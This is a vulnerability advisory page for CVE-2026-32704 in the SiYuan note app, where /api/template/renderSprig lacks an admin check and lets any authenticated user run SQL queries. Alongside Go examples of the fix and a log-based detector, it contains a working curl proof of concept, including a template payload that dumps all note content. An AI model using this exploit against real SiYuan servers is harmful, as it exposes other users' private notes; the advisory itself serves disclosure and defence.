
Docker CVE-2026-32704

EUVD-2026-12146 | MEDIUM
Improper Authorization (CWE-285)
2026-03-13 https://github.com/siyuan-note/siyuan GHSA-4j3x-hhg2-fm2x
CVSS 3.1 base score: 6.5

CVSS Vector (NVD)

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: None
Availability: None

Lifecycle Timeline

- Patch released (patch available): Mar 31, 2026 - 21:13 (nvd)
- PoC Detected (public exploit code): Mar 17, 2026 - 19:02 (vuln.today)
- EUVD ID Assigned (EUVD-2026-12146): Mar 13, 2026 - 21:01 (euvd)
- Analysis Generated: Mar 13, 2026 - 21:01 (vuln.today)
- CVE Published: Mar 13, 2026 - 20:56 (nvd)

Severity: MEDIUM (6.5)

Description (NVD)

Summary

POST /api/template/renderSprig lacks model.CheckAdminRole, allowing any authenticated user to execute arbitrary SQL queries against the SiYuan workspace database and exfiltrate all note content, metadata, and custom attributes.

Details

File: kernel/api/router.go

Every sensitive endpoint in the codebase uses model.CheckAuth + model.CheckAdminRole, but renderSprig only has CheckAuth:

```go
// Missing CheckAdminRole: only CheckAuth guards this route
ginServer.Handle("POST", "/api/template/renderSprig",
    model.CheckAuth, renderSprig)

// Correct pattern used by all other data endpoints
ginServer.Handle("POST", "/api/template/render",
    model.CheckAuth, model.CheckAdminRole, model.CheckReadonly, renderTemplate)
```

renderSprig calls model.RenderGoTemplate (kernel/model/template.go), which registers SQL functions from kernel/sql/database.go:

```go
(*templateFuncMap)["querySQL"] = func(stmt string) (ret []map[string]interface{}) {
    ret, _ = Query(stmt, 1024)  // executes raw SELECT, no role check
    return
}
```

Any authenticated user - including Publish Service Reader role accounts - can call this endpoint and execute arbitrary SELECT queries.
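The two controls the advisory contrasts, a role gate in the handler chain and the set of functions the template may call, can be shown side by side. The following is an added example written for this page, not SiYuan's code: it uses net/http instead of gin, the role arrives in a constructed `X-Role` header instead of a real session, and `fakeQuerySQL` echoes the statement instead of querying SQLite. `newMux(false)` reproduces the CheckAuth-only chain from the advisory; `newMux(true)` adds the admin gate that `/api/template/render` already has. As a second, independent layer, `funcMapFor` builds the template FuncMap per role, so a non-admin template that references `querySQL` fails at parse time even on the ungated route.

```go
package main

import (
	"fmt"
	"io"
	"net/http"
	"net/http/httptest"
	"strings"
	"text/template"
)

// Role is a constructed stand-in for the caller's session role.
type Role string

const RoleAdmin Role = "admin"

// roleFromRequest is a constructed substitute for the session lookup that
// model.CheckAuth performs in SiYuan: here the role simply arrives in a header.
func roleFromRequest(r *http.Request) (Role, bool) {
	switch h := r.Header.Get("X-Role"); h {
	case "admin", "reader":
		return Role(h), true
	}
	return "", false
}

// checkAuth rejects unauthenticated callers (analogue of model.CheckAuth).
func checkAuth(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if _, ok := roleFromRequest(r); !ok {
			http.Error(w, "unauthenticated", http.StatusUnauthorized)
			return
		}
		next.ServeHTTP(w, r)
	})
}

// checkAdminRole rejects authenticated non-admins (analogue of model.CheckAdminRole).
func checkAdminRole(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if role, _ := roleFromRequest(r); role != RoleAdmin {
			http.Error(w, "admin role required", http.StatusForbidden)
			return
		}
		next.ServeHTTP(w, r)
	})
}

// fakeQuerySQL stands in for the kernel/sql Query call; it touches no database
// and only echoes the statement so the caller can see which path ran.
func fakeQuerySQL(stmt string) []map[string]interface{} {
	return []map[string]interface{}{{"stmt": stmt}}
}

// funcMapFor is the second control: the FuncMap handed to the template is
// built per role, so querySQL is simply not defined for non-admins.
func funcMapFor(role Role) template.FuncMap {
	fm := template.FuncMap{"upper": strings.ToUpper}
	if role == RoleAdmin {
		fm["querySQL"] = fakeQuerySQL
	}
	return fm
}

// renderSprig renders the request body as a Go text/template with the
// role-scoped FuncMap; an undefined function is a parse error (HTTP 400).
func renderSprig(w http.ResponseWriter, r *http.Request) {
	role, _ := roleFromRequest(r)
	src, _ := io.ReadAll(r.Body)
	tpl, err := template.New("sprig").Funcs(funcMapFor(role)).Parse(string(src))
	if err != nil {
		http.Error(w, err.Error(), http.StatusBadRequest)
		return
	}
	var out strings.Builder
	if err := tpl.Execute(&out, nil); err != nil {
		http.Error(w, err.Error(), http.StatusBadRequest)
		return
	}
	io.WriteString(w, out.String())
}

// newMux registers the endpoint. withAdminGate=false reproduces the CheckAuth-only
// chain from the advisory; withAdminGate=true is the chain /api/template/render uses.
func newMux(withAdminGate bool) *http.ServeMux {
	mux := http.NewServeMux()
	var h http.Handler = http.HandlerFunc(renderSprig)
	if withAdminGate {
		h = checkAdminRole(h)
	}
	mux.Handle("/api/template/renderSprig", checkAuth(h))
	return mux
}

// render issues one POST against mux and returns the status code and trimmed body.
func render(mux *http.ServeMux, role, tmpl string) (int, string) {
	req := httptest.NewRequest("POST", "/api/template/renderSprig", strings.NewReader(tmpl))
	if role != "" {
		req.Header.Set("X-Role", role)
	}
	rec := httptest.NewRecorder()
	mux.ServeHTTP(rec, req)
	return rec.Code, strings.TrimSpace(rec.Body.String())
}

func main() {
	for _, gate := range []bool{false, true} {
		code, body := render(newMux(gate), "reader", `{{querySQL "SELECT 1"}}`)
		fmt.Printf("adminGate=%v reader -> %d %s\n", gate, code, body)
	}
}
```

With the gate in place a reader gets 403 before the template is even parsed; without it, the per-role FuncMap still turns the same request into a 400 `function "querySQL" not defined`, while an admin renders normally. The router-level gate is the actual fix the advisory's "correct pattern" describes; scoping the FuncMap is the extra layer that would have blunted this class of bug even with the route misregistered.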

PoC

Environment:

```bash
docker run -d --name siyuan -p 6806:6806 \
  -v "$(pwd)/workspace":/siyuan/workspace \
  b3log/siyuan --workspace=/siyuan/workspace --accessAuthCode=test123
```

Exploit:

```bash
# Step 1: Login and retrieve API token
curl -s -X POST http://localhost:6806/api/system/loginAuth \
  -H "Content-Type: application/json" \
  -d '{"authCode":"test123"}' -c /tmp/siy.cookie

sleep 15
# wait for boot

TOKEN=$(curl -s -X POST http://localhost:6806/api/system/getConf \
  -b /tmp/siy.cookie -H "Content-Type: application/json" -d '{}' \
  | python3 -c "import sys,json; print(json.load(sys.stdin)['data']['conf']['api']['token'])")
# Step 2: Execute SQL as non-admin user
curl -s -X POST http://localhost:6806/api/template/renderSprig \
  -H "Authorization: Token $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"template":"{{querySQL \"SELECT count(*) as n FROM blocks\" | toJson}}"}'
```

Confirmed response on v3.6.0:

```json
{"code":0,"msg":"","data":"[{\"n\":0}]"}
```

Full note dump:

```bash
curl -s -X POST http://localhost:6806/api/template/renderSprig \
  -H "Authorization: Token $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"template":"{{range $r := (querySQL \"SELECT hpath,content FROM blocks LIMIT 100\")}}{{$r.hpath}}: {{$r.content}}\n{{end}}"}'
```

Impact

Any authenticated user (API token holder, Publish Service Reader) can:

  • Dump all note content and document hierarchy from the workspace
  • Exfiltrate tags, custom attributes, block IDs, and timestamps
  • Search notes for stored passwords, API keys, or personal data
  • Enumerate all notebooks and their structure

This is especially severe in shared or enterprise deployments where lower-privilege accounts should not have access to other users' notes.
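For a shared deployment, the practical question is whether a non-admin account has already called this endpoint. The following is an added detection example written for this page, not part of the advisory or of SiYuan: it scans a constructed reverse-proxy access log in a combined-log-like layout (the advisory does not show SiYuan's own log format, so the sample and its field positions are assumptions) and flags POSTs to `/api/template/renderSprig` by any user outside an admin allowlist, separating confirmed 2xx renders from rejected attempts.

```go
package main

import (
	"bufio"
	"regexp"
	"strings"
)

// sampleLog is a constructed access log (client, authenticated user, request
// line, status, bytes). It is not SiYuan's own log format.
const sampleLog = `10.0.0.5 - alice [17/Mar/2026:19:02:11 +0000] "POST /api/template/renderSprig HTTP/1.1" 200 48
10.0.0.7 - bob [17/Mar/2026:19:03:40 +0000] "POST /api/template/render HTTP/1.1" 403 21
10.0.0.9 - reader1 [17/Mar/2026:19:05:02 +0000] "POST /api/template/renderSprig HTTP/1.1" 200 8192
10.0.0.9 - reader1 [17/Mar/2026:19:05:03 +0000] "GET /stage/build/app/index.html HTTP/1.1" 200 3011
10.0.0.9 - reader1 [17/Mar/2026:19:05:04 +0000] "POST /api/template/renderSprig HTTP/1.1" 401 12
`

// lineRe captures client, user, method, path and status from one log line.
var lineRe = regexp.MustCompile(`^(\S+) \S+ (\S+) \[[^\]]*\] "(\S+) (\S+) [^"]*" (\d{3})`)

// Hit is one call to the vulnerable endpoint by a non-admin user.
type Hit struct {
	Client, User, Path, Status string
}

// findRenderSprigCalls returns every POST to /api/template/renderSprig made by
// a user that is not in the admin allowlist, regardless of status, so an
// analyst also sees rejected probing from the same account.
func findRenderSprigCalls(log string, admins map[string]bool) []Hit {
	var hits []Hit
	sc := bufio.NewScanner(strings.NewReader(log))
	for sc.Scan() {
		m := lineRe.FindStringSubmatch(sc.Text())
		if m == nil {
			continue // not an access-log line we understand
		}
		client, user, method, path, status := m[1], m[2], m[3], m[4], m[5]
		if method != "POST" || path != "/api/template/renderSprig" {
			continue
		}
		if admins[user] {
			continue // admins are allowed to use template rendering
		}
		hits = append(hits, Hit{Client: client, User: user, Path: path, Status: status})
	}
	return hits
}

// confirmed keeps only hits whose 2xx status means the render actually ran,
// i.e. the unpatched code served a non-admin.
func confirmed(hits []Hit) []Hit {
	var out []Hit
	for _, h := range hits {
		if strings.HasPrefix(h.Status, "2") {
			out = append(out, h)
		}
	}
	return out
}
```

In the sample, alice's call is allowlisted and bob hit the correctly gated `/api/template/render`, so only reader1 is reported: one confirmed 200 render of 8192 bytes and one rejected 401 attempt. After upgrading past the fix the same rule is useful as a canary, since any non-admin 2xx on this path means an unpatched instance is still serving traffic.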

Analysis (AI)

CVE-2026-32704 is a security vulnerability (CVSS 6.5). Risk factors: public PoC available.


Remediation (AI)

Within 30 days: Identify affected systems and apply vendor patches as part of regular patch cycle. Monitor vendor channels for patch availability.


Vendor Status (Vendor)


CVE-2026-32704 vulnerability details – vuln.today
